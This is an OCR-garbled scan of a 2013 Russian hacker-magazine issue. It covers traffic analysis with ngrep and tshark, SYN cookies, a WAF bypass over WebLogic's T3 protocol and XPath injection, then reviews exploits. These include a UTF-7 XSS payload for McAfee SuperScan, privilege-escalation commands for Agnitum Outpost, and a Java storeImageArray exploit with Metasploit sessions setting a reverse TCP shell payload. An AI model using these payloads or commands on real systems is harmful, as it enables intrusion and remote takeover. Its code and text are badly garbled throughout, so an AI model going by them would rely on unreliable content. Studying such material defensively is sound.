ЗроМуР2Р 3.4323 00.89%, * 
Зровуегуег 21952 11.70% ——= = 
$5Н 29028 02.69%, | 
$51 1.7414 30.05% ею | 


Определяем протоколы в дампе трафика 


ПОИСК ПОДСТРОКИ В СЕТЕВОМ ТРАФИКЕ 


РЕШЕНИЕ 

Еще одна стандартная задачка — поиск всякой интересной информации 
в незнакомом протоколе. Конечно, во многом главным инструментом опять- 
таки остается \\Итезпагк, который позволяет искать и текстовые строки, 
и Пех, а также поддерживает юникод... Вот только автоматизировать этот 
процесс с \ММтезпагк нельзя. Простой пример — мы хотим найти поле с паро- 
лем. Но оно ведь может называться раз$\мога, раз$$, рм/а... Что же сделать? 
Есть парочка решений. 

Первое — воспользоваться классической утилиткой погер (сокращение 
от Мемогк Сгер). Она проста, быстра, хотя и не очень показательна. Одна- 
ко с задачей поиска справляется вполне хорошо. Мдер может производить 
поиск в рсар-файле или из живого трафика (что тоже может быть интерес- 

о). При этом умеет искать строки, бинарщину, частично поддерживае регу- 
лярные выражения. Вот пример с поиском строки Ра$з$\мога: 


пргер.ехе -Т фе5%.рсар "Ра$змога" 
пргер.ехе -Т %е5$*.рсар -хх_ "0х50617373776+7264" 
. -|—_ откуда читать данные; 


. -хХ — поиск Пех-строки; 
. -Х — вывод в Пех-формате. 


Как один из минусов можно отметить, что погер не воссоздает сессии, 
а ищет данные в отдельных пакетах. Скачать ее можно отсюда: 900.4 
\МРЕСОсА. 

Второй вариант — воспользоваться консольным собратом \\Мпезпагк’а — 
{зПагк’ом. Он входит в комплект с \\тезпагк’ом, так что устанавливать ни- 
чего не надо. От него нам потребуется возможность вывода только части 
информации (параметр -Т Не!а$). Мы можем указать, используя стандарт- 
ные фильтры, какой конкретно поток данных нам необходимо проанализи- 
ровать (например, по типу протокола или по 1Р-адресам), чтобы избавиться 
от излишков информации. А дальше указать ему, чтобы он выводил только, 
например, исходящий 1Р-адрес (для идентификации пакета) и сами данные 
из пакета. После этого в наших руках вся сила консоли для обработки обыч- 
ного потока строк, в виде дгер’а и других утилит. Для повторения последне- 
го варианта воспользуемся следующим правилом: 


{5ПагК.ехе -г фе$®.рсар -Т #е14$ -е 1р.згс -е дажа -п | += 
5гер "5061737377617264" 


РЕШЕНИЕ 

В продолжение предыдущей темы интересен также вопрос с определением 
типа протокола в трафике. Здесь, правда, все значительно труднее. Если 
протоколы низкого уровня определить не проблема (транспортный и ниже), 
а также выделить 5$1-трафик, например, то чистый уровень приложений — 
это уже проблема. 

Конечно, \\Мгезпагк (и его аналоги) все хорошо «подсвечивают», но во 
многом на основании привязки протоколов к каким-то типовым портам. От- 
клонения от этого, не говоря уж о смешении протоколов, не позволяют ему 
определить протокол. 

В качестве помощника может пригодится утилита ЭРО (доо.а/ЛкЬУУ) — 
своего рода концепт идентификатора протоколов. Она задействует гораздо 
больший ряд параметров и паттернов, что серьезно увеличивает вероят- 
ность определения протокола. 

К сожалению, база невелика. Так что в большинстве случаев определять 
протоколы приходится на основании своих познаний и размышлений. 


МлгезНагкК (и его аналоги) все хоро- 
шо «подсвечивают», но во многом 
на основании привязки протоколов 
к каким-то типовым портам 


. -Г —_ Откуда читать инфу (возможно прямо с интерфейса); 

. _ -ГНеа$ — выводить только конкретные поля; 

.‚ -@ — перечисление необходимых полей пакета для их вывода; 
. -П — не резолвиты ГР в имена. 


При этом следует отметить, что если бы формат пакета (аррИсайоп- 
уровень) был известен {5пагк’у, то мы могли бы обратиться к конкретному 
его полю, а не просто как к ааа. 


И пукер-1 .45—м11п32—Ь1п\Ве 1еазе ?>пчкер.-.ехе -—1 %е5%.рсар ‘Раззчока"“ 
: $ез $. рсар 
: Раззчока 
НУНННАИНИНННИННИННИННИННИЕ 
Т 192.168 .184.132:49441 . 172 .16.0.158:7001 [ЯР] 
: .хрзр. -хр. . ЖЕ. - ме 1очлтсик . 
и а коп. а ниве р у 
-хры. . - „.меЪ1очтс -кдуп. С1аззТаБ1еЕпеку/Ве . у 
[дача . 1апч. ОБдесе; .. бе .хры. ^. .меЪ1о91с .кдут . СТАСТАЬТеЕ А 
$ ку/Ве .М „Зача.иЕ11_Фескок. - - -сараству[пскетепЕТ . .е1етеп 
ЕЕ ара Па обв. `..меЪ10916 _кдут. 
С1аз5ТаЪ1еЕпеку/Ве .\ Я ет Г ар к В 
Нея [ . -секе1Ё1савез® . .Ьлача/ие11/Чесвок; Ц. . 14% . „Шача/лапа/ ЕР з1 .оЪ 
ГизсасейРазмов4® . .[ВЬ. -кеа1тНатеч -“^. -хры. .. .имеъ1о9лс .кдум. Т ппц 
а ааы хк - >иеЪ1091с - кп]. ев, Ваз 1сЗеку1тсеСопеехе 
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ЗАЩИТИТЬСЯ ОТ ЗУМ-ФЛУДА 


РЕШЕНИЕ 

Такая техника, как зуп-Нооа, некогда была достаточно мощной ВоЗ-атакой. 

Хотя, конечно, после изобретения и повсеместного внедрения «зуп-сооке» 

потенциал ее изрядно подтупился и вся тема покрылась пылью. В результа- 

те теперь не так много людей в курсе того, что же такое зуп-сооке и как оно 
работает. И это мне кажется удивительным, ведь решение само по себе 
оказалось достаточно интересным. Так что позволю себе познакомить тебя 

с ним. Вдобавок скажу, что тема эта пригодится для решения еще одной за- 

дачки, которая будет в следующем номере. 

Итак, для начала нам надо понять, что же такое зуп-флуд. Здесь все про- 
сто, только необходимо вспомнить, как устанавливается ТСР-соединение. 
У нас есть клиент, есть сервер. Клиент посылает первый ТСР-пакет на сер- 
вер с установленным флагом $\М (зупспготхаНоп) в заголовках пакета. Сер- 
вер, получив пакет, отвечает вторым ТСР-пакетом, только указывая в заго- 
ловке флаги — $\М и АСК (аскпомеаде). Дальше клиент должен ответить 
пакетом с флагом АСК, и данные можно передать. 

Как видишь, всего три шага. А теперь прикинь, что мы с этим можем сде- 
лать. Во-первых, после отправки первого пакета мы вроде как должны (как 
клиенты) дождаться ЗУМ + АСК. Но ведь можем и не дожидаться! А в то же 
время сервер, получив ЗУМ, обязан ожидать последующего пакета — АСК. 
Во-вторых, первый пакет мы можем послать от любого |!Р-адреса, если у нас 
нет цели получить второй пакет от сервера. В-третьих, сами пакеты малень- 
кие по объему. 

Вдобавок к этому, получив 5\М-пакет, сервер должен «помнить» о ха- 
рактеристиках начавшегося подключения, и это, наверное, самое главное. 
То есть сервер должен помнить, а клиент — нет (если нет цели устанавли- 
вать соединение). 

Таким образом, мы очень просто можем отправить большое количество 
5УМ-запросов на сервер. И каждый из них он обязан будет контролировать. 
По каждому — должен ожидать АСК-пакет от клиента, после собственного 
ЗУМ + АСК пакета. Итог: на сервере переполняется очередь полуоткрытых 
подключений и легитимные клиенты уже не могут подключиться. Вот так все 
просто. Можешь глянуть на картинке пример. 

Так вот — защита оказалась вполне элегантной. Если не углубляться 
в подробности, то основная фича в том, чтобы избавить сервер от необхо- 
димости вести эти самые очереди. Как же этого добились? Для понимания 
нам надо вспомнить про такое поле ТСР как Зеацепсе питрег. Оно пред- 
ставляет собой 32-битное поле и содержит случайное число, по которому 
определяется ТСР-сессия. 

Так вот, при использовании зуп-сооке отказываются от использова- 
ния 5уп-очереди, в которой должны храниться «настройки» подключения. 
А для ее хранения используют как раз это поле — Зеацепсе питрег. Звучит 
странновато, но все в итоге просто. 

Упрощенная схема по генерации зуп-соомке: 

1. Берется время прихода $\УМ\М-пакета (ИтезЗатр), с помощью которого 
можно отмерять 64-секундные промежутки. 

2. Из пакета достается тахитит зедтепт{ зте (М$$), которое необходимо 
хранить в очереди для корректной работы ТСР. 

3. Берется хеш от 1Р-адреса и порта клиента и сервера, а также значение 
из первого пункта. 

4. Дальше конкатенируется 5 бит из Нтефатр’а, М$$ кодируется в значе- 
ние из 3 бит (есть таблица соответствия), а также 24 бита хеша. Итог — 32 
бита. 

5. Сервер кладет их в Зедчепсе питрег ТСР-пакета, который отправляется 
клиенту (ЗУМ + АСК). 


Резонный вопрос — зачем это все? А затем, что клиент (легитимный) 
будет отвечать серверу пакетом с АСК, но, что важнее, с тем же значени- 
ем, которое сервер прислал ему. То есть клиент пошлет этот Зеачцептсе 
питбег серверу обратно, только теперь оно будет располагаться в другом 
поле — Аскпоммеадае питбег — и значение будет на единицу больше (это 
по стандарту ТСР так положено). Но главное, сервер, получив обратно это 
значение, сможет «восстановить» изначальный 5\№-пакет. Сервер вынима- 
ет нтезатр и проверяет, не просрочен ли пакет. Если все ОК, то изтрех бит 
он сможет восполнить М$$. А пересчет хеш-функции позволит не беспоко- 
иться о возможности внедриться в соединение за счет перебора 5еачцепсе 
питбег. 

Только представь, какое оказалось лаконичное и четкое решение. А глав- 
ный изюм — не нужно дорабатывать и изменять ТСР-протокол! Мне лично 
очень нравится. Да, есть и минусы — продвинутые фичи ТСР срезаются. Но, 
ИМХО, на этом можно поучиться. 
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«ОБОЙТИ МАЕ», ИСПОЛЬЗУЯ ПРОТОКОЛ ТЗ 


РЕШЕНИЕ 

Немного о жизни и веселых штуках-дрюках, которые встречаются на практике. 
Не так давно пришлось заняться ломанием \\ебЁосс’а, в рамках подготовки 
к Васк Нат 1а5 \еда$. Там оказалось очень много веселых моментов, но одна 
ситуация меня совсем позабавила, чем и поделюсь. 

Итак, есть такая штука, как Ме -одгс от ОгасЕе. Это сервер приложений. Что- 
бы понятней было — это что-то типа Тотсага, только еще больше Ещегризе. Так 
вот, на нем для исследования был развернут продукт — Реоребой. Последний 
представляет собой большой портал для управления персоналом или финанса- 
ми. Фактически это не так важно. Важно другое. 

По умолчанию \№МебЁГодс имеет отдельный специальный ТСР-порт (7001-й 
вроде), на котором висит веб-консоль для администрирования. Основное же 
веб-приложение обычно висит на каком-нибудь стандартном порту — 80, 443. 
И получается, что все безопасно. Особенно сучетом того, что обычно в интернет 
торчат только определенные порты. Но после обследования РеореЗой в связке 
с Ме од обнаружилась интересная настройка. И административный интер- 
фейс, и сам портал располагались на одном и том же порту — на 80-м (44 3-м). 

Быстренько прогуглив мир, я проверил это дело и обнаружил, что очень мно- 
гие РеоребоЁг’ы в такой конфигурации и установлены. То есть по определен- 
ному УВЁу доступна админская панель, «рядом» с самим порталом. На самом 
деле, с учетом того, что было раскопано в Реоребой, это оказалось приличней- 
шим фейлом. Лишь небольшой ряд компаний догадались перенести админ- 
скую панель на другой порт. 

Но больше меня позабавил другой пример. В одном из найденных «в дикой 
природе» образцов админы оставили панель в состоянии по умолчанию, но за- 
крыли к ней доступ, используя \М/АЕ (или какую-то похожую фигню). То есть за- 
претили любые запросы копределенному ИВКу. Казалось бы, что все ОК, но это 
было до поры до времени. 


ПРОВЕСТИ ХРАТН-1МЕСТОМ 


РЕШЕНИЕ 

Ну и напоследок сегодня немножко классического \Меб’а. Мы поговорим 

о такой странной, но, несомненно, важной штуке, как ХРа-инъекции. Зна- 

ния о них лягут в несколько тем следующих номеров. Но для начала нам надо 

вспомнить про такую вещь, как ХМЕ, ибо ХРа{И на ней полностью повязана. 
ХМЕ — это такое древообразное структурированное представление дан- 

ных. Фича его в большой гибкости, так как разметка не фиксируется, а также 

в возможности восприятия и людьми, и программами. Ну или что-то типа того. 
Основные элементы ХМЕ — это: 

. элемент; 

. атрибут; 

. значение. 


В примере <+ехЕ $17е="8"> зоте уа1ие </{ехЕ>{ех{ — это элемент; ме — 
атрибут; зоте уаше — значение. Все, в общем-то, просто и легко. 

Так вот, ХРайЙ — это язык запросов к элементам ХМЁ-документа. ХРа{й при- 
зван реализовать навигацию по ВОМ вХМЕ. Это говорит нам вики. И как верно 
там также сказано, ХМЕ можно сравнить с файловой системой, а ХРаЙ — это 
путь до конкретных файлов. 

С помощью ХРа{ можно в самом простом виде передвигаться по ХМЕ- 
дереву и выбирать какие-то его ветви или элементы. Если же углубиться 
в него, то можно найти возможности по глубокому и точному поиску. Для луч- 
шего понимания легче всего привести парочку примеров. 

Итак, мы имеем ХМЕ-документ — см. рисунок. ХРай-запросы: 


1. /боокчоге/боокАЩе даст нам доступ ко всем элементам {1 е. 

2. //4Ще сделает аналогичное, но в данном случае мы указываем не прямой 
полный путь, а относительный. ХРа{И сам найдет все элементы {1 е. 

3. /Боокзоге/боокрисе>35]/рийсе выберет все элементы с ценой больше 35. 

4. //*[соип(ащПог)>1] — а здесь мы делаем выборку, только с количеством 


авторов больше 1. 

5. /Боок$оге/Боок[1]/уеаг/оЙомипа::* выдаст нам выборку по оси, то есть все 
элементы, что идут после элемента уеаг. 

6. /боокзюге/вБоокрисе>35 (/ | //*[соип{(ащпог)>1] — совмещаем, выбираем 
по цене и количеству авторов. 

7. //е[зиптоа-епо(пате()) > 10] — с длинным названием. 
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В ходе исследования \Меб Тосс оказалось, что тот поддерживает такой про- 
приетарный протокол от Огасе, как ТЗ. По сути, это такой уама-протокол, вроде 
как подвид или развитие технологи ВМ! (гетфе тепо4 шуосаНоп). Применяет- 
ся он для администрирования \ММе -одгс и дает возможность использовать весь 
тот же функционал, что и админская панель, только еще удобно автоматизиро- 
вать все задачи. 

Но самое забавное, что находится он на том же порту, что и админская па- 
нель. Вот только формат данных совсем не НТТР... Если на порт приходит НТТР- 
трафик, то отрабатывает НТТР-обработчик, а если ТЗ — то ТЗ-обработчик. Вот 
такой хитрый \\МебЁосгс. 

Теперь, думаю, ты понимаешь, к чему все пришло. ЦВЕ к панели был забло- 
кирован, но если посылать «чистый» ТЗ на это порт, то подключение к Ме -од!с 
происходило. Вот и получился такой забавный ура :). 


="СООКИМС" 
="еп">Еуегудау Кайап 


сада Ое Гаигепи$ 
2005 
30.00 


Пример ХМЕ-документа 


Консолидирую сказанное. Мы имеем возможность манипулировать пере- 
движениями по дереву, выполнять логические и арифметические операции, 
а также манипуляции со строками. Побольше с примерами ХРа{Й можно по- 
знакомиться здесь: аоо.а/у>\\М/МУа (совково, но показательно :)). 

Так вот, теперь мы напрямую подошли к инъекциям. Обыденный пример: 
ломаем мы, предположим, какой-то веб-портал. Ау него информация хранит- 
ся вХМЁ-файлах, и для поиска по ним сервер использует ХРа{|. Тут мы и «под- 
совываем свою кавычку», чтобы фактически внедриться в процесс поиска. 

Сразу сделаю несколько важных ремарок. Во-первых, ХРа очень по- 
хожи на 5ОЕ-инъекции. То есть нам также нужно вырваться за строку в само 
ХРай-выражение. И делается это во многом как раз за счет использования 
кавычек. Во-вторых, сама эксплуатация опять-таки аналогична во многом 
$ОЕ-инъекциям. Есть обычные, есть на основе ошибок, есть слепые. Техники 
по сути те же, только функции несколько другие. В-третьих, главная проблема 
ХРа! 1.0 (для атакующего) в его ограниченности. В отличие от ЗОЕ здесь нет 
продвинутых возможностей (взаимодействовать с ОС, например). Фактиче- 
ски чаще всего все, что мы можем, — это полностью слить все данные из ХМЕ- 
файла, к которому применяется ХРа1й. Да, мы даже не можем выйти за его 
пределы. Грустно, конечно, но подожди до следующего номера и увидишь ряд 
прелестей даже в таких ситуациях. 

Если есть пожелания по разделу Еазу Наск или жаждешь поресерчить — 
пиши на ящик. Всегда рад :). И успешных познаний нового! == 


У\УАВММС 


Вся информация предо- 

ставлена исключительно 

в ознакомительных целях. & 

Ни редакция, ни автор не несут 

ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 


В этом выпуске мы разберем 
0-Чау-уязвимость в нашей люби- 
мой уа\ма, получим права админи- 
стратора в «непробиваемой» О$ Х 
и рассмотрим несколько критиче- 
ских ошибок, которые с успехом 
можно проэксплуатировать, в попу- 
лярных продуктах. 


Х55-УЯЗВИМОСТЬ В МСАЕЕЕ ЗОРЕВЗСАМ 4.0 


С\$$у2: М/А 

Дата релиза: 8 августа 2013 года 

Автор: Рю Визхуп$К! @агк1\м (Тгизмаме Зраег-а6з$) 
С\Е: 2013-4884 


Зирегзсап 4 — это М/пао\ми5-утилита от МсАее для сканирования портов, 
которую можно использовать как сканер ТСР-портов, пингатор и ответчик. 
Программа содержит ошибку, позволяющую провести обратимую Х$5$-атаку. 
Из-за того что приложение недостаточно корректно обрабатывает вводимые 
параметры, возможно вернуть пользователю отчет сканера с «необычным» 
ответом, который выполнит произвольный код в браузере. Кстати, есть один 
нюанс: произвольный код передается в кодировке ЦТЕ-7. 


ЕХРЕО!Т 
Пример атакующего запроса с возможностью вставки своего кода: 


+АОм-1т8 згс=х опеггог='а зе ег=а1ег* , а="0ТЕ-7-Х$5"; '+АБд- 


Как это выглядит на экране, можно посмотреть на скриншоте «Х$$- 
уязвимость в МсАЕее Зирег$сап 4.0». Процесс эксплуатации можно автома- 
тизировать с помощью программы Ро[зроот (БИ.1у/17\К72.) от автора уязви- 
мости. 


ОБЗОР 
ЭКСПЛОЙТОвВ 


АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 


ХАКЕР 10 /177/2013 


У 


Борис Рютин, ЦОР (Езаде [аБ) 
дикебагтап@хакер.ги, 


@дикерагтап 


ТАРСЕТЗ 
МсАГее Зирегзсап 4.0. 


ЗОШТЮМ 


Есть исправление от производителя. 


__ Зирег5сап Верог! - МогШа РугеГох 
Ре ЕФ \Мем Н&огу  Вооктай$  Тоо5 Нар 


^ @ У % в `В 
[2] МозЁ Мейед № сенпа экатед Гаех НеаФпез | | Зиааезед 5ез | |] \\!еБ 55се сайегу 


Зирег$сап Кероп - 07105113 18:33:20 


Не: ///С:Оосутеги$ апд е таз {Ата габог /Ое$Кор{терои.КЕги| С): 


Р 172.16.37.145 
НозАпате (Уакпочип] 


ЖБЕВИ | [Рауабсир! АррёсаНоп] 


кто ИТЕ-7-Х55 


9090 
У\еб$М $50 1234 


9091 НТТР/1.0 
(Чакпомип] 
бекуек: ВчС]-?ТР 


Тота! по31$ зсомегеа 1 


Х$$-уязвимость в МсА{ее Зирег$сап 4.0 


ХАКЕР 10 /177/2013 Обзор эксплойтов 


ПОВЫШЕНИЕ ПРИВИЛЕГИЙ В АСМТИМ 
ООТРОЗТ ЗЕСИВПУ ЗИЛЕ 8.1 


С\$$у2: М/А 

Дата релиза: 2 августа 2013 года 

Автор: Аптаа Модпитгака та!Оса{ 
СУ\Е: М/А 


Программа Ошро${ Зесищу Зике Рго от компании АдпКйит содержит уязви- 
мость типа переполнение буфера в драйвере $апаБох .5у$. Ошибка возни- 
кает при недостаточной проверке переданных параметров для 10осй-команды 
80000208. Это позволяет атакующему локально вызвать переполнение буфе- 
ра, в результате чего мы получим отказ в обслуживании или сможем выпол- 
нить произвольный код. 


ЕХРЕО!Т 
Для начала скачаем исходники эксплойта с сайта автора ( ). 
Если сайт будет недоступен, то попробуй найти их в базе эксплойтов ( 
). Эксплойт состоит из двух частей: 
ехр1о1* .срр — код самого эксплойта; 
х.911 — ОШ -библиотека, которая запускает процесс ста.ехе с правами 
администратора. 


Исходники компилируются с помощью ра{-файла таКе.Ба* или вручную 
(для примера возьмем компилятор с! из Миа! Зи): 


с1 /1 х.срр 
с1 ехр1о1*.срр 


После чего из-под непривилегированного пользователя необходимо за- 
пустистить следующие команды: 


С: \>Веё$\г32.ехе /5 С:\Ргоргат Е11ез\аёп1ит\ОцЕро${ $есиг1у +: 
Ы1е РРО\..\.. А АХ 
С: \>ехр101*.ехе 


ТАРВСЕТЗ 
АдпКцит Ошро${ Зесищу Зийе < 8.1. 


ЗОШТЮМ 


На момент написания статьи патча не было. 


ЛА\А ЗТОВЕТМАСЕАВВА\() — НЕПРАВИЛЬНОЕ 
ИНДЕКСИРОВАНИЕ МАССИВА 


С\$$у2: М/А 

Дата релиза: 11 августа 2013 года 

Автор: Мате \М/киппеа (Раскет Зогт) 
С\Е: 2013-2465 


И снова уязвимость нулевого дня в уама. Правда, ее опубликовали на доволь- 
но популярном сайте, посвященном ИБ, — Раске$ опт, а не как обычно по- 
сле массового использования в эксплойт-паках. 

Уязвимость неправильного индексирования находится внутри натив- 
ной функции $юоге!тадеАггау() библиотеки )ге/61п/ам*.а11 (исходный код 
можно найти по следующему пути: \)ак\згс\$Паге\па*1\уе\ип\ам\1табе\ 
ам _рагзеТтазе.с): 


°фогеТтазеАггау(ЭМТЕпу *епу, Ви Ттаве$_& *5гсР, ++ 
ВиТтаве$_+ *а5{Р, т116 1таёе *т11ЬТиР) 
{ 
15Ег1ае; 
*стбафаР, *ЧафаР, *сОажаР; 
Н1и*$_ *И1и ЕР = &95{Р->П1пт5$; 
Ва тег5_+ *газфегР = &а5{Р->газЖег; 
у; 


(П1пЕР->расК1пе == ВУТЕ_ТМТЕВЕЕАМЕО) { 
стбафаР = ( 
(п1161ТмР); 
15Ег1ае = м116 Тмабебее${г1ае (м116ТтР); 


*) т116 ТтаребееБа*а+ =» 


' НЕНИЯ 
.---.. 50 а@`; к 
.” @@@@@’., '@@ ее@е@',.'@@@@ ". 
'- . обобе@е@@@@ сессосесевеве 0; 

`. аееобасасава собссосасаеаеа .' 

"--'.@@@ -.@ и --. 
".@';@ | 
@@@@ @@@ 


639 ацх111агу - 182 ро${ 
30 епсодег$ - 8 пор$ 


[ 
+ -- --=[ 1152 ехр\о1{$ - 
--=[ 


+ -- 310 рау\оа9$ - 
м5г> у5е ехр\1о1{ /ти1 {1 /Бгои5ег/)]ауа_$Тоге1тадеаггау 

мг ехр1о1{( ) > зе{ф рау\1оад )]ауа/5Ве\1_геуегзе_Тср 
рау1оа4 => ]ауа/зПе11_геуеге_Тср 

мг ехр1о1{( ) > зет{ 1НО$Т 192.168.141.1 

-НО$Т => 192.168.141.1 

мг ехр1о1{( > ет В\У$ЗНОТ 192.168.141.1 

КУ$ЗНОТ => 192.168.141.1 
м$Г ехр1о\1{( 

ИВТРАСН => / 

$ ехр1о1{( 


сет УВТРАСН / 


ехр1о1 1 


Пример эксплуатации уязвимости в функции $1оге!тадеАггау() 


ДафаР = ( *) (*еп\м) - >= 
бе{Рг1т11уеАггауСг1{1са1(епу, газ{егР->]4афа, МУ); 
(аафаР == МИЕЬ) 0; 


СсБафаР = ЧафаР + И1пЕР->афаО{Р5е*; 
(у=0; у < газфегР->Нетвй*; 
у++, ст)афаР += м5%&г1ае, сБафаР += +! 
Ю1иЕР->$5г1ае) 


тетсру (сбафаР, ст)афаР, га$хегР - >= 
мт аЕИ*Н1пЕР->питСвпап$); 


— 


Указатель дафаР берется из поля дафа Чауа-объекта зип.аме.1таве. 
ВуфеРаскеаВа*ег. В свою очередь, значение п1п{Р->дафа0{Р5е{ — из поля 
ДафаВв1 ОР 5ет{. 

Напрямую ВуеРаскеаРащег недоступен, но можно к нему обра- 
титься, создав с помощью публичного метода да\уа.ам*.1тарве.Ка$з*ег. 
сгеафемг1+аб1еКаз*ег(): 


ри Мг1аб1еКазег сгеафеймг1аб1еВаз*ег ( 
5атр1еМоае]1 $т, 

БафаВи++ег аЪ, 

Ро1п{ Тосае1оп 


); 

Структура вызова этой функции и следующих представлены на сайте 
Огасе в разделе с официальной документацией ( ). 

Первый параметр функции сгеафемг1+аб1еКаз*ег() — это 
Зауа.ам* .1тазе .$5атр1еМоае1. Простая модель Зауа.ам* .1таде. 


Ми11Р1хе1РаскКед$атр1еМоде1 нужна, чтобы создать Ву%еРаскКеЧВа$*ег. 
Сама же функция вызывается со следующими параметрами: 


рчб11с Ми11Р1хе1РасКкед$атр1еМоае1 ( 
1п{ Дафатуре, 
1" м, 
ое ИП, 
1и* питбего+В1т$, 
1и{ 5сап11пез$гтае, 
1иЕ Чафав1теОЕР ее 


у 


б> 


Ми1{1Р1хе1Раске@$атр]1еМмоде1 принимает параметр аафаВв1{О++5ет 
без каких-либо проверок. Конструктор ВуфеРаскедКаз*+ег() вычисляет зна- 
чение дафаВ1+0++Р5е*, основанное на параметрах Затр!еМоче! и РайаВиНег. 
Рассмотрим исходник этой функции в файле \)ак\згс\зПаге\с1а$е5\5зип\ 
ам{\1таёе\ВуфеРаскеаВа$Тег.)а\а: 


риб11с ВуфеРаскеаВа$*ег($атр1еМо4е1 затр1еМоае1, 
ОБафаВи+Рег дафаВи++ег, 
Весфап51е аКезё1оп, 
Рози ог1е1п, 
ВуфеРаскеЧаКаег рагепф){ 

зирег ( затр1еМоде1 , дакаВи{Рег , аКеё1оп,ог121п, рагеп{); 

{01$.таххХ = т1иХх + м1а*и; 

{01$.мах\У = м1иУу + Ве1ей*; 

1+ (!(аафаВиЕРег 1п5Фапсео+ БафаВи+егВу*е)) { 

ЕЮгом пем ВазегЕогта*Ехсер*1оп+= 
("ВусеРаскеЧ4Ваег$ ти Вауе" + 
"Буфе ОБафаВи+ег$"); 

} 

ОафаВи РегВуфе аб = (БафаВи+егВу*е ) дафаВи ег; 

{015.Чафа = х%еа1Бафа(аьб, 9); 

1+ (а66.веЕМитВапк$() 1= 1) { 

ЕАкгом пем 
Ваз егЕогта*Ехсер*1оп ( "РафаВиег +ог += 
ВуфеРаскеаВа$+ег5" + " миз{ оп1у Пауе 1 Бапк."); 
—__} 


1пЕ АБОЕР5ее = а6Ь.вефоР5е*(); 
1+ (затр1еМо4е1 1п5%апсео+ Ми1{1Р1хе1Раскед$атр1еМо4ае1) { 
Ми1{1Р1хе1РасКе4$атр1еМоде1 тррзт = 
(Ми1Е1Р1хе1РаскКе4$атр1еМоде]1 ) затр1еМоде1 ; 
{01$5.фуре = ТперегСотропепВа${ег. «= 
ТУРЕ _ВУТЕ_ВТМАКУ _$АМРЕЕЗ; 
р1хе1В1Е$Ег1ае = тррзт.ве{Р1хе1В1Е$г1ае(); 
1+ (р1хе1В1%5%г1ае != 1 && 
р1хе1В151г14е != 2 && 
р1хе1В1Е5Ег1ае != 4) { 
{Югом пем ВазегРЕогта*Ехсер*1оп 
_("ВуфеРаскеЧКаз{егз миз® пПауме а 614 4ереИ = — 
ОР 1, 2. ОР 4") 
} 
5сап11пе5{г14е = тррзт.вее$сап11пе {г1ае(); 
ДафаВ10+5е{ = тррзт.ве{БафаВ1ЕО0+5е*() + ‹* 
АаБОЕР5ет*8; 
1п{ хОЕР5еф = аКеё1оп.х - ог121п.х; 
1п{ уО+ЕЕ5еф = аКеё1оп.у - ог1е1т.у; 
ДафаВ1О+5еф += хОРР5е*р1хе1В1 $ г1ае + +! 
УОЕ5е**5сап11пе5{г14е*8; 
Б1ЕМазК = (1 << р1хе1В1Е5г1ае) -1; 
$11ЕЕОЕР5ее = 8 - р1хе1В1%5г1ае; 
р ее { 
ЕИгом пем Ваз%егРогта*Ехсер Топ ( "Ву{еРаске4Ваег$ += 
ти$Е Пауе" + "Ми11Р1хе1Раске$атр1еМо4е1"); 


} 
уег1 у (Ра15е); 


А попытка проверки параметра дафаВ1{0+Р5е{ осуществляется с помо- 
щью следующего кода: 


рг1уафе \мо1а мег1Фу (Боо1еап $&г1сЕСПеск) { 


1+ (аафаВ1ОЕР5е* < 9) { 
ЕИгом пем Ваз%егРогта*Ехсер* Топ ("Бафа о+Е5еф$ ми$е += 
| Бе >= 0"); 
} 
1пЕ 1а$5%61Е = (дафаВ1 ОР е* 
+ (Пе1теН{-1) * 5сап11пезг1ае * 8 
+ (м1аЕв-1) * рухе1В1Е5Егтае 
+ р1хе1В1е5%г1ае - 1); 
1+ (Лазфб1е / 8 >= адафа.1епёЕ В) { 
ЕИгом пем ВазегЕогта*Ехсер* Топ ("газ%ег 41теп$10п$ += 
оуегЯом " + "аггау Боипа$"); 


} 
1+ (эЕг1сЕСИеск) { 
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1 (Петене > 1) { 
1аз{61Е = м1аеи * р1хе1В1Е5г1ае - 1; 
1+ (1Лаз%б1е / 8 >= зсап11пезеглае) { 
ЕИгом пем ВазегРогта*Ехсер1оп+- 
("Чата Рог а@]асепе" + " зсап11пез оуег1ар$"); 


В итоге если ты не видишь многократное переполнение целого числа 
со знаком внутри функций ВуфеРаскКедКаз*ег() и уег1Фу() или если не зна- 
ешь, как использовать целочисленное переполнение, то в данном случае 
\уег1 Ру () позволяет тебе установить дафаВ1+0+Р5е{ почти в восемь раз боль- 
ше, чем дата. 1епёЕИ. Поэтому дафаВ1ОЕР5еф можно указать вне массива 
Дата, а этого будет достаточно для повреждения памяти внутри родной функ- 
ции 5фогеТтадеАггау(). 

Обычно повреждение памяти не случается с ВуЕеРаскеЯВаз*ег благо- 
даря условию 1+ (В1пР->расК1пв == ВУТЕ_ТМТЕВЕЕА\УЕО) внутри функции 
$фогеТтареАггау(). К счастью, это можно обойти, если форсированно пере- 
дать уауа на обработку байты, упакованные как перемежающиеся растры, ис- 
пользуя объект Со1огМоде1. Для лучшего понимания скачай исходники с сай- 


та раске$юогт (6{./у/178ЕМбо). 


ЕХРЕОТ 

Эксплойт существует в двух видах: 
НТМЕ-страница (опубликован на сайте раскеюогт); 
модуль для Мщазр/оц. 


Эксплойт от раскыюгт успешно работает в \\ММп4о\м$ и ОЗ Х системах. 
Если в случае с \\ММпао\м$ все привычно, то тебя должен заинтересовать не- 
большой кусок кода, который будет работать в обеих системах и пригодится 
для наших с тобой РоС: 
рг1\уаЕе Боо1еап _1$Мас = Зуз%ет. ве Ргорег\у ("о$ .пате","") „+= 
сопфа1п$ ("Мас"); 

+ (Зузкет. век$есиг1уМапавег() == пи11) { 
Вип 1те . геЕКипЕ1те ().ехес(_1$Мас ? "/Арр11саЕ1оп$ /+= 
Са1сч1а® ог .арр/Соп%еп*$/Мас0$ /Са1си1афог" : "са1с.ехе"); 


Правда, есть небольшой нюанс: если эксплойт будет запущен в Ипих, 
то он попытается работать как в М/пом5. 
Из консоли Маазр!ой эксплуатация выглядит следующим образом: 


т$Е>и5е ехр101%/ти1 1 /Бгом5ег/)ауа_5фогеТтавеАггау += 
Тпуа11А_Аггау_Тпдех1п8 

15+ ехр101* (]ауа_$5$огеТтавеАггау_Тп\уа119_Аггау_Тпаех1п) 
се $К\/НО$Т 192.168.23.70 

15+ ехр101* (Зауа_$фогеТтавеАггау_Тпуа119_Аггау_Тпаех1п#) > += 
се ИВТРАТН / 

15+ ехр101* (Зауа_$5%огеТтавеАггау_Тпуа119_Аггау_Тпаех1пй) > += 
